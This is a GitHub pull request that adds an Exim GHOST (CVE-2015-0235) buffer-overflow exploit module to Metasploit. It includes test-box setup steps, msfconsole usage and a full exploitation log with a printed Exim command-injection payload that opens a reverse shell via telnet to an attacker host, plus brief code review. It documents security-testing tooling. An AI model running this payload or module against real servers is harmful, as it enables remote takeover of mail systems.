Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2015-0235: Exim GHOST (glibc gethostbyname) Buffer Overflow #4956

Merged
merged 6 commits into from
Mar 20, 2015
Merged

Add CVE-2015-0235: Exim GHOST (glibc gethostbyname) Buffer Overflow #4956

merged 6 commits into from
Mar 20, 2015

Conversation

wchen-r7
Copy link
Contributor

This is an exploit for CVE-2015-0235, a heap buffer overflow vulnerability in glibc gethostbyname. It specifically targets Exim servers to prove exploitability. Originally written by Qualys.

I did the testing and made small changes to the modules:

  • I moved most of the module's description as a new wiki document, because there's so much info. You can read it here: http://r-7.co/1CAnMc0
  • All the fail_with messages will also refer to the same wiki doc
  • Other minor things like more references

Setup

  • To prepare a box for testing, please download Debian 7 and install it: http://ftp.cae.tntech.edu/debian-cd/dvd/debian-7.7.0-i386-DVD-1.iso
  • On the Debian box, open /etc/exim4/exim4.conf.template, and then add helo_verify_hosts = * under MAIN CONFIGURATION SETTINGS
  • Do: sudo update-exim4.conf
  • Do: sudo /etc/init.d/exim4 restart
  • Do: grep helo /var/lib/exim4/config.autogenerated | grep verify, and make sure you see helo_verify_hosts = *, like this:
$ grep helo /var/lib/exim4/config.autogenerated | grep verify
helo_verify_hosts = *

Now you are ready for testing.

If you can find me in person, you can try my box instead.

Verification

  • Start msfconsole
  • Do: use exploit/linux/smtp/exim_gethostbyname_bof
  • Do: set rhost [The Exim server's IP]
  • Do: set sender_host_address [Your IP]
  • Do: run
  • You should get a shell like the following demo:
msf exploit(exim_gethostbyname_bof) > run

[*] Started reverse double handler
[*] Trying information leak...
[!] {:heap_shift=>736}
[!] {:write_offset=>128, :error=>"503 sender not yet given"}
[!] {:write_offset=>136, :error=>"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"}
[!] {:error=>["\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given", "", "503 \x89\x10", "177", "177\\177\\177", "vJN\\177\\177\\177\\177"]}
[!] {:leaked_arch=>"x86"}
[!] {:count=>{"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"=>8, "hF\xFE\xB7hF\xFE\xB7er not yet given"=>2}}
[+] Successfully leaked_arch: x86
[+] Successfully leaked_addr: b7fda760
[*] Trying code execution...
[!] ${run{/usr/bin/env setsid /bin/sh -c "sh -c '(sleep 4011|telnet 192.168.1.64 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.64 4444 >/dev/null 2>&1 &)'"}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>21}
[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>25}
[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>20}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>8}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>6}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>12}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>19}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>29}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>23}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>18}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>14}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>3}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>29}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>28}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd02a1", :offset=>26}
[!] {:reply=>{:code=>"550", :lines=>["550 sikVtqGxFOjCBOWTbDupmIuJRmLmShFNqqUYRRPUolyxPmmgLCenEzConuVGWafjgycyRfXulGNwmAOvkqZkGobMyUIMPojZsaziCjVVyvabOrcieEWrLZSgnCCXHeXjIzGGfUALAIubgBEmsKsSWSGa\r\n"]}}
[+] Brute-force SUCCESS
[+] Please wait for reply...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qaNpBmRBEus9XoVZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "qaNpBmRBEus9XoVZ\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.64:4444 -> 192.168.1.166:58859) at 2015-03-19 03:36:52 -0500

@wvu wvu self-assigned this Mar 19, 2015
@void-in
Copy link
Contributor

void-in commented Mar 20, 2015

Shouldn't the I_KNOW_WHAT_I_AM_DOING be changed to FORCE_EXPLOIT or something which give some idea what the option is doing?

@wchen-r7
Copy link
Contributor Author

Sure we can do that.

@wvu
Copy link
Contributor

wvu commented Mar 20, 2015

Good usability change. Thank you, @void-in.

wvu
wvu reviewed Mar 20, 2015
View reviewed changes
modules/exploits/linux/smtp/exim_gethostbyname_bof.rb
fail_with("smtp_connect", "sock is nil") if not sock
@smtp_state = :recv

banner = smtp_recv(220)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I noticed that banner is not being used. Do you think it might be worthwhile to check for Exim in the 220?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't think checking the banner is necessary, because if the check triggers the bug and tells you it's vulnerable, there is no point to trust the passive/banner check (or even look at it).

I can get rid of the banner variable if you want. I imagine they just wanted to make it obvious that this line is receiving the banner.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah, I agree. Remove it!

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ok.

@wvu wvu merged commit 1b67a06 into rapid7:master Mar 20, 2015
wvu added a commit that referenced this pull request Mar 20, 2015
@wvu
Land #4956, Qualys' Exim GHOST module
859b54f
@todb-r7 todb-r7 mentioned this pull request Mar 25, 2015
Closed
@wchen-r7 wchen-r7 deleted the ghost branch August 22, 2016 16:30
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @void-in @wvu